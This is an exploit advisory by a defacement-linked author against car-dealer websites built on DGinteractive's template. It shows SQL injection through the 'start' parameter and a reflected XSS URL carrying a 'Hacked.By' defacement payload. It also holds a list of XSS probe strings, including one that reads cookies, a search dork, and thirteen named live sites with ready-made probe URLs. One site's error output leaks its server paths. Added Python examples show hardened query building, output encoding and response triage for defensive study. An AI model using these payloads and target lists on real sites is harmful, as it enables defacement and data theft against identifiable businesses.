KingSkrupellos

DGinteractive Internet Automobile XSS SQL Injection

May 20th, 2020
####################################################################

# Exploit Title : DGinteractive Internet Automobile XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21 May 2020
# Vendor Homepage : dginteractive.fr
+ dginteractive.fr/creation-de-sites-internet/creation-site-internet-mandataire-automobile-concession-garage
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') ]
CAPEC-66 [ SQL Injection ]
CAPEC-63 [ Cross-Site Scripting (XSS) ]
# Google Dorks : DGinteractive : création de site internet automobile
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities

###################################################################

# Impact :
***********
Car-dealer sites built on DGinteractive's automobile template are prone to an SQL injection vulnerability
because the application fails to sanitize user-supplied data before using it in an SQL query. The database
error reproduced at the end of this advisory shows the injected value landing in the LIMIT clause of a
SELECT on the dg_produit table that is executed through PDO->query(), i.e. the parameter is concatenated
into the statement rather than bound. Exploiting this issue could allow an attacker to compromise the
application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote
attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL in
the application's database; further exploitation may result in unauthorized data manipulation. An attacker
can exploit this issue using a browser or any SQL injection tool.
Caveat for anyone verifying this: an injection point after LIMIT is more constrained than one inside a
WHERE clause (MySQL rejects an unparenthesized UNION after LIMIT), so what can actually be extracted
depends on the MySQL version and on whether the driver accepts stacked statements. Independently of that,
the verbose error output already discloses the query text, the table name and the server-side path of the
including script.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response.
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
to a vulnerable web application, which is then reflected back to the victim and executed by the
web browser. The most common mechanism for delivering malicious content is to include
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
URLs constructed in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
the attacker's content back to the victim, the content is executed by the victim's browser.

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
***********************************************************************************
The software constructs all or part of an SQL command using externally-influenced input from an
upstream component, but it does not neutralize or incorrectly neutralizes special elements that could
modify the intended SQL command when it is sent to a downstream component.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
********************************************************************************
The software does not neutralize or incorrectly neutralizes user-controllable input before
it is placed in output that is used as a web page that is served to other users.

Cross-site scripting (XSS) vulnerabilities occur when:

1. Untrusted data enters a web application, typically from a web request.

2. The web application dynamically generates a web page that contains this untrusted data.

3. During page generation, the application does not prevent the data from containing content
that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes,
mouse events, Flash, ActiveX, etc.

4. A victim visits the generated web page through a web browser, which contains
malicious script that was injected using the untrusted data.

5. Since the script comes from a web page that was sent by the web server, the victim's
web browser executes the malicious script in the context of the web server's domain.

6. This effectively violates the intention of the web browser's same-origin policy, which states
that scripts in one domain should not be able to access resources or run code in a different domain.

CAPEC-66: SQL Injection
************************
This attack exploits target software that constructs SQL statements based on user input.
An attacker crafts input strings so that when the target software constructs SQL statements
based on the input, the resulting SQL statement performs actions other than those the application intended.
SQL injection results from the application's failure to appropriately validate input.
When specially crafted user-controlled input consisting of SQL syntax is used without proper validation
as part of SQL queries, it is possible to glean information from the database in ways not envisaged
during application design. Depending upon the database and the design of the application,
it may also be possible to leverage the injection to have the database execute system-related commands
of the attacker's choice. SQL injection enables an attacker to talk directly to the database,
thus bypassing the application completely. Successful injection can cause information disclosure
as well as the ability to add or modify data in the database.

CAPEC-63: Cross-Site Scripting (XSS)
************************************
An adversary embeds malicious scripts in content that will be served to web browsers.
The goal of the attack is for the target software, the client-side browser, to execute the script
with the user's privilege level. An attack of this type exploits a program's vulnerabilities that are
brought on by allowing remote hosts to execute code and scripts. Web browsers, for example,
have some simple security controls in place, but if a remote attacker is allowed to execute
scripts (through injecting them into user-generated content like bulletin boards) then these
controls may be bypassed. Further, these attacks are very difficult for an end user to detect.

###################################################################

# SQL Vulnerable Parameter :
**************************
?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]

The injectable parameter is start (the result-page offset). As the database error at the end of this
advisory shows, its value is placed unquoted into the LIMIT clause of the product query, so a single
quote (start=1%27) is enough to break the statement and trigger the error.

# SQL Injection Exploit :
**********************
/index.php?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]

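The query construction implied by the error message quoted at the end of this advisory, as an added example (not DGinteractive's code, whose source is not public): Python with SQLite standing in for PHP/PDO and MySQL. It shows the vulnerable concatenation that yields "LIMIT 1',16" beside a hardened version that validates start and limite as unsigned integers and binds them as parameters. The table and column names come from the query in the error; the rows are constructed sample data.

```python
"""Why start=1' breaks the product query, and how to build the LIMIT clause safely.

Added example, not DGinteractive's code: inc.resultat.php is not public, so the
query builder below is reconstructed from the error message quoted in this
advisory ("... ORDER BY titre ASC LIMIT 1',16"). SQLite stands in for MySQL/PDO.
"""
import re
import sqlite3

# Query text as disclosed by the error; only the LIMIT clause is built from
# the request (start first, then limite), exactly as the error shows.
BASE_QUERY = ("SELECT * FROM dg_produit WHERE publie=1 AND vendu=0 "
              "GROUP BY id_produit ORDER BY titre ASC")


def build_query_vulnerable(start: str, limite: str) -> str:
    """The pattern implied by the error: raw request strings concatenated into SQL."""
    return f"{BASE_QUERY} LIMIT {start},{limite}"


def run_vulnerable(conn: sqlite3.Connection, start: str, limite: str):
    """Execute the concatenated query; returns ('ok', rows) or ('error', message)."""
    try:
        return "ok", conn.execute(build_query_vulnerable(start, limite)).fetchall()
    except sqlite3.OperationalError as exc:  # MySQL raises 1064 / PDOException here
        return "error", str(exc)


def parse_offset_and_limit(start: str, limite: str, max_limit: int = 100) -> tuple:
    """Allow-list validation: both values must be short unsigned decimal integers."""
    for name, value in (("start", start), ("limite", limite)):
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise ValueError(f"{name}: expected an unsigned integer, got {value!r}")
    offset, limit = int(start), int(limite)
    if not 1 <= limit <= max_limit:
        raise ValueError(f"limite must be between 1 and {max_limit}")
    return offset, limit


def fetch_products_safe(conn: sqlite3.Connection, start: str, limite: str):
    """Hardened version: validate, then bind the integers as query parameters.

    The PDO equivalent is a prepared statement with bindValue(..., PDO::PARAM_INT)
    for both LIMIT operands; string binding would be quoted and rejected by MySQL.
    """
    offset, limit = parse_offset_and_limit(start, limite)
    # SQLite accepts the MySQL-style "LIMIT offset, count" form with placeholders.
    return conn.execute(f"{BASE_QUERY} LIMIT ?,?", (offset, limit)).fetchall()


def is_rejected(start: str, limite: str) -> bool:
    """True when the validator refuses the pair (shows the probe value is blocked)."""
    try:
        parse_offset_and_limit(start, limite)
    except ValueError:
        return True
    return False


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample table; column names follow the query in the error."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dg_produit (id_produit INTEGER PRIMARY KEY, "
                 "titre TEXT, publie INTEGER, vendu INTEGER)")
    conn.executemany("INSERT INTO dg_produit VALUES (?,?,?,?)", [
        (1, "Megane", 1, 0), (2, "Clio", 1, 0), (3, "Twingo", 1, 1),
        (4, "Captur", 1, 0), (5, "Espace", 0, 0),
    ])
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    print(build_query_vulnerable("1'", "16"))   # ... ORDER BY titre ASC LIMIT 1',16
    print(run_vulnerable(db, "1'", "16"))       # ('error', ...) like the PDOException
    print(fetch_products_safe(db, "1", "2"))    # [(2, 'Clio', 1, 0), (1, 'Megane', 1, 0)]
    print(is_rejected("1'", "16"))              # True
```

The integer allow-list is what makes the fix robust: a LIMIT operand is never legitimately anything but a number, so escaping is the wrong tool here and validation plus a typed bind removes the injection entirely.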
# Cross Site Scripting XSS Exploit :
********************************
/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked.By.KingSkrupellos.%3C/font%3E%3C/marquee%3E

The same start value in the partially decoded form the author lists:

1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>

Note that the payload begins with 1', the same character that breaks the SQL statement; the reflection is
consistent with the verbose database error echoing the failed query, payload included, into the page.
Further probe strings to substitute for the start value:

"><script>alert(String.fromCharCode(88,83,83))</script>

">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1

<ScRipT>alert("XSS");</ScRipT>

"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

"><ScRiPt>alert(document.cookie)</script>

data:text/html,<script>alert(0)</script>

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

<svg onload=alert(1)//

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

"`'><script>\xE2\x80\x84javascript:alert(1)</script>

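The reflection described above, as an added example (not DGinteractive's code): Python that decodes the exploit URL's start value the way PHP's $_GET would, models the sink as the verbose error page echoing the failed SQL statement (an assumption drawn from the error text in this advisory; the real template is not public), and contrasts it with the same page using contextual HTML encoding. The canary probe at the end is the generic check a tester runs to see which HTML metacharacters a parameter reflects unencoded; the host in the URL is a placeholder and PAYLOADS is a subset of the probe strings listed above.

```python
"""Reflected XSS through the start parameter: unsafe echo, encoded echo, canary probe.

Added example, not DGinteractive's code. render_error_page() assumes the reflection
happens where this advisory's evidence points: the database error that prints the
failed SQL statement, injected value included, into the response body.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Exploit URL from the advisory; the host is a placeholder.
EXPLOIT_URL = ("http://dealer.example/index.php?page=resultat&formu_marque=7&formu_categorie=3"
               "&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1"
               "&start=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3E"
               "Hacked.By.KingSkrupellos.%3C/font%3E%3C/marquee%3E")

# A few of the probe strings listed in the advisory.
PAYLOADS = [
    "\"><script>alert(String.fromCharCode(88,83,83))</script>",
    "<ScRipT>alert(\"XSS\");</ScRipT>",
    "<svg onload=alert(1)//",
    "';alert(String.fromCharCode(88,83,83))//",
]

# Assumed shape of the sink: the application's error message followed by the query.
ERROR_TEMPLATE = ("<b>Erreur recup liste produit</b> You have an error in your SQL syntax ... :: "
                  "SELECT * FROM dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit "
                  "ORDER BY titre ASC LIMIT {start},16")


def start_param(url: str) -> str:
    """Decode the start value exactly as PHP's $_GET would (percent-decoded)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["start"][0]


def render_error_page(start: str) -> str:
    """Vulnerable sink: the raw request value reaches the HTML body via the SQL error."""
    return ERROR_TEMPLATE.format(start=start)


def render_error_page_safe(start: str) -> str:
    """Same page with output encoding; quote=True also covers attribute contexts."""
    return ERROR_TEMPLATE.format(start=html.escape(start, quote=True))


def unencoded_metachars(render, value: str, mark: str = "zq9k"):
    """Reflected-XSS probe: wrap value in a unique marker, render it, and report which
    HTML metacharacters come back raw between the markers. None means not reflected."""
    out = render(mark + value + mark)
    i = out.find(mark)
    j = out.find(mark, i + len(mark)) if i >= 0 else -1
    if i < 0 or j < 0:
        return None
    segment = out[i + len(mark):j]
    return sorted({c for c in segment if c in '<>"\''})


def surviving_payloads(render, payloads=PAYLOADS) -> list:
    """Payloads whose HTML-significant characters are reflected unencoded."""
    return [p for p in payloads if unencoded_metachars(render, p)]


if __name__ == "__main__":
    value = start_param(EXPLOIT_URL)
    print(value)                                             # 1'<marquee>...</marquee>
    print("<marquee>" in render_error_page(value))           # True
    print("<marquee>" in render_error_page_safe(value))      # False
    print(unencoded_metachars(render_error_page, '<">\''))   # ['"', "'", '<', '>']
    print(unencoded_metachars(render_error_page_safe, '<">\''))  # []
    print(surviving_payloads(render_error_page_safe))        # []
```

Two things the probe makes visible: a value that is "reflected" but with every one of `<>"'` encoded is not exploitable in an HTML body or quoted attribute context, and turning display_errors off would hide this particular sink without fixing the missing encoding, so both changes belong in the remediation.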
###################################################################

# Example Vulnerable Sites and Vulnerable IP Addresses :
***************************************************
The addresses below are shared hosting servers; the domain counts say how many sites share each server,
not how many of them run the DGinteractive application or are vulnerable.

Reverse IP results for (213.186.33.2)
There are 60,082 domains hosted on this server.

Reverse IP results for (164.132.235.17)
There are 89,323 domains hosted on this server.

Reverse IP results for (213.186.33.19)
There are 145,637 domains hosted on this server.

Reverse IP results for (87.98.154.146)
There are 84,065 domains hosted on this server.

Reverse IP results for (213.186.33.107)
There are 1,380 domains hosted on this server.

Reverse IP results for (213.186.33.16)
There are 66,886 domains hosted on this server.

Reverse IP results for (217.160.0.58)
There are 14,732 domains hosted on this server.

Reverse IP results for (213.186.33.4)
There are 114,183 domains hosted on this server.

Reverse IP results for (217.160.0.116)
There are 14,867 domains hosted on this server.

Reverse IP results for (213.186.33.40)
There are 95,065 domains hosted on this server.

Reverse IP results for (213.186.33.3)
There are 103,623 domains hosted on this server.

Reverse IP results for (81.88.48.95)
There are 11,443 domains hosted on this server.

[+] milleniumauto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] ie-auto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] adourimport.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] autoimportjls.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] lmda-automobiles.fr//index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] auto-direct-import.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] neuve-occaz-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] milleniumautogalerie.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] garagefillon.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] autoimport72.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] priscar.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] camping-saint-meen.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

###################################################################

# Example SQL Database Error :
****************************
Erreur recup liste produit You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '',16' at line 1 :: SELECT * FROM
dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit ORDER BY titre ASC LIMIT 1',16

Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or
access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '',16' at line 1' in /home/cuisiniezb/www/inc.resultat.php:11
Stack trace:
#0 /home/cuisiniezb/www/inc.resultat.php(11): PDO->query('SELECT * FROM d...')
#1 /home/cuisiniezb/www/index.php(538): include('/home/cuisiniez...')
#2 {main}
thrown in /home/cuisiniezb/www/inc.resultat.php on line 11

What the error establishes: the request values start=1' and limite=16 appear verbatim as "LIMIT 1',16",
the statement is issued with PDO->query() rather than a prepared statement, and PHP error display is
enabled, so the response leaks the table name (dg_produit), the including script and the document root
(/home/cuisiniezb/www/). "Erreur recup liste produit" is the application's own message ("error fetching
product list").

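A triage helper for the probe responses, as an added example that is not part of the advisory: it classifies one response body to the start=1' request by checking for the MySQL 1064 signature, extracting the disclosed query and confirming the injected value sits in its LIMIT clause (rather than merely "some SQL error" appearing), and collecting the leaked server-side paths. SAMPLE_BODY is the error text quoted above with whitespace normalised; CLEAN_BODY is a constructed negative case. Fetching the listed URLs is left to the reader's HTTP client.

```python
"""Classify a response to the start=1' probe: real LIMIT-clause injection or noise?

Added example, not part of the advisory. SAMPLE_BODY is the error output quoted
in the advisory (whitespace normalised); CLEAN_BODY is a constructed negative.
"""
import re

SAMPLE_BODY = (
    "Erreur recup liste produit You have an error in your SQL syntax; check the manual that "
    "corresponds to your MySQL server version for the right syntax to use near '',16' at line 1 "
    ":: SELECT * FROM dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit ORDER BY titre "
    "ASC LIMIT 1',16 Fatal error: Uncaught exception 'PDOException' with message "
    "'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL "
    "syntax; check the manual that corresponds to your MySQL server version for the right syntax "
    "to use near '',16' at line 1' in /home/cuisiniezb/www/inc.resultat.php:11 Stack trace: "
    "#0 /home/cuisiniezb/www/inc.resultat.php(11): PDO->query('SELECT * FROM d...') "
    "#1 /home/cuisiniezb/www/index.php(538): include('/home/cuisiniez...') "
    "#2 {main} thrown in /home/cuisiniezb/www/inc.resultat.php on line 11"
)

CLEAN_BODY = "<html><body><div class='resultat'>16 vehicules</div></body></html>"  # constructed


def triage_response(body: str, injected: str = "1'", limite: str = "16") -> dict:
    """Return the evidence found in one response body.

    mysql_1064: MySQL syntax-error text present.
    query: the statement the application printed after '::', if any.
    injection_in_limit: the probe value is the first LIMIT operand of that statement
        and limite is the second, i.e. start reached the LIMIT clause unquoted.
    paths: server-side .php paths leaked by the PHP fatal error.
    uses_pdo_query: the stack trace shows PDO->query() (no prepared statement).
    """
    mysql_1064 = ("You have an error in your SQL syntax" in body
                  or bool(re.search(r"\b1064\b", body)))
    # The application prints ':: <query>' after its own message; stop before the PHP fatal error.
    m = re.search(r"::\s*(SELECT\b.*?)(?=\s*Fatal error:|$)", body, re.S)
    query = m.group(1).strip() if m else None
    limit_m = re.search(r"\bLIMIT\s+(\S+)\s*,\s*(\S+)", query) if query else None
    injection_in_limit = bool(limit_m and limit_m.group(1) == injected
                              and limit_m.group(2) == limite)
    paths = sorted(set(re.findall(r"(/home/[\w./-]+\.php)", body)))
    return {
        "mysql_1064": mysql_1064,
        "query": query,
        "injection_in_limit": injection_in_limit,
        "paths": paths,
        "uses_pdo_query": "PDO->query(" in body,
    }


def verdict(result: dict) -> str:
    """Collapse the evidence into one label for a results table."""
    if result["injection_in_limit"]:
        return "confirmed"          # probe value echoed inside the LIMIT clause
    if result["mysql_1064"]:
        return "sql-error"          # error present but query not disclosed / not matching
    return "no-signal"


if __name__ == "__main__":
    r = triage_response(SAMPLE_BODY)
    print(verdict(r), r["paths"])   # confirmed [...inc.resultat.php, ...index.php]
    print(verdict(triage_response(CLEAN_BODY)))  # no-signal
```

A "no-signal" result only means this particular verbose error is not shown; a host with display_errors off can still be injectable, which is why the advisory's probe (a bare quote) is a first pass and not a proof of absence.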
###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################